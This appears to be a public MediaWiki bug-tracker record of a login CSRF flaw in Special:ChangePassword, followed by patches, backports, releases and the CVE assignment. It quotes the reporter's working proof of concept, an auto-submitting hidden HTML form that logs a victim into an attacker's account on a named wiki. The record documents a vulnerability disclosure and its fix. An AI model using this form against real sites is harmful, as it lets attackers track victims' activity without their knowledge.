Login csrf in Special:ChangePassword
Closed, ResolvedPublic

Description

Gopinath (via codex.galleryproject.org) reported a login csrf on Special:ChangePassword. Confirmed this in master. Note with the PoC, the victim must have an existing _session cookie on the target wiki, otherwise the login fails.

Special:ChangePassword should use a login token.

On Sun, Mar 9, 2014 at 12:16 PM, Bharat Mediratta <bharat@menalto.com> wrote:

Hi, Wikimedia folks - Gopinath is reporting a vulnerability in Mediawiki 1.22.3 which is running on codex.galleryproject.org - can you take a look at this and decide whether it's something you want to resolve in the Mediawiki codebase?

-Bharat

On Fri, Mar 7, 2014 at 10:14 PM, Gopinath <gopiengg@gmail.com> wrote:
Hi,
Through below CSRF Code user can be logged into the attackers account, without knowledge of user.So attacker can track the user activity.
User also wont know the attacker account password .Attacker can request password reset for his account and can get the value of wpPassword parameter.

POC Code

<html>
<head>
</head>
<body onload=document.forms[0].submit();>
<form action="http://codex.galleryproject.org/Special:ChangePassword" method="POST">

<input type="hidden" name="returnto" value="Main Page" />
<input type="hidden" name="token" value="+\" />
<input type="hidden" name="wpDomain" value="" />
<input type="hidden" name="wpName" value="Gopinath6" />
<input type="hidden" name="wpNewPassword" value=password1234 />
<input type="hidden" name="wpPassword" value=7qbuqjjsme />
<input type="hidden" name="wpRetype" value=password1234 />

</form>
</body>
</html>

Regards
Gopinath


Version: 1.23.0
Severity: normal

Details

Reference
bz62497
csteipp created this task.Mar 10 2014, 5:47 PM

Created attachment 14787
Add CSRF token on Special:ChangePassword

Attached: bug62497.patch

The patch looks good to me.

Early access for Wikia.

Do we already have a CVE for this bug?

Not yet. I'll request one as soon as we make it public.

Created attachment 14927
Backport to REL1_22

Backported to the best of my knowledge. Special:ChangePassword tested. Can't reproduce the attack, so someone with a deeper understanding of this vulnerability should look at it and confirm it fixes the security issue.

attachment bug62497-122.patch ignored as obsolete

Created attachment 14933
Backport to REL1_22

I hit a couple issues when testing your patch. I think this is a slightly better way to do it.

Attached: bug62497_122.patch

Created attachment 14938
Backport to REL1_21

Backport similar to 14933, so Chris' changes are already considered. Changing passwords was tested. Please look for potentail security implications.

Attached: bug62497_121.patch

Created attachment 14939
Backport to REL1_19

Considering Chris' new version of the backport for REL1_22. Tested password change. Still works.

Attached: bug62497_119.patch

Tested the 1.19 backport patch, and confirmed it fixes the vulnerability.

Fix is released in MW 1.19.14, 1.21.8 and 1.22.5. WMF sites are patched.

Comment on attachment 14787
Add CSRF token on Special:ChangePassword

The token compare function is _not_ running in constant time. As we have a function for token comparison, we should use it here.

see http://www.gossamer-threads.com/lists/wiki/mediawiki-cvs/436923 (well, this is essential for _password_ comparison, perhaps not necessarily needed for token comparison, as already discussed elsewhere)

For the records, https://www.mediawiki.org/w/index.php?title=Project:Support_desk#Session_Hijacking_error_after_Update_1.19.14_41441 lists an issue with the 1.19.14 tarball including the backport for this.

Markus just released 1.19.15 to fix the password reset issue.

Correction, Markus will release 1.19.15 tomorrow to fix the issue. Sorry about that.

This was assigned CVE-2014-2665.

http://openwall.com/lists/oss-security/2014/04/01/7

The MITRE email also documents their understanding of "Login CSRF", which is good background if this issue pops up again.

Add Comment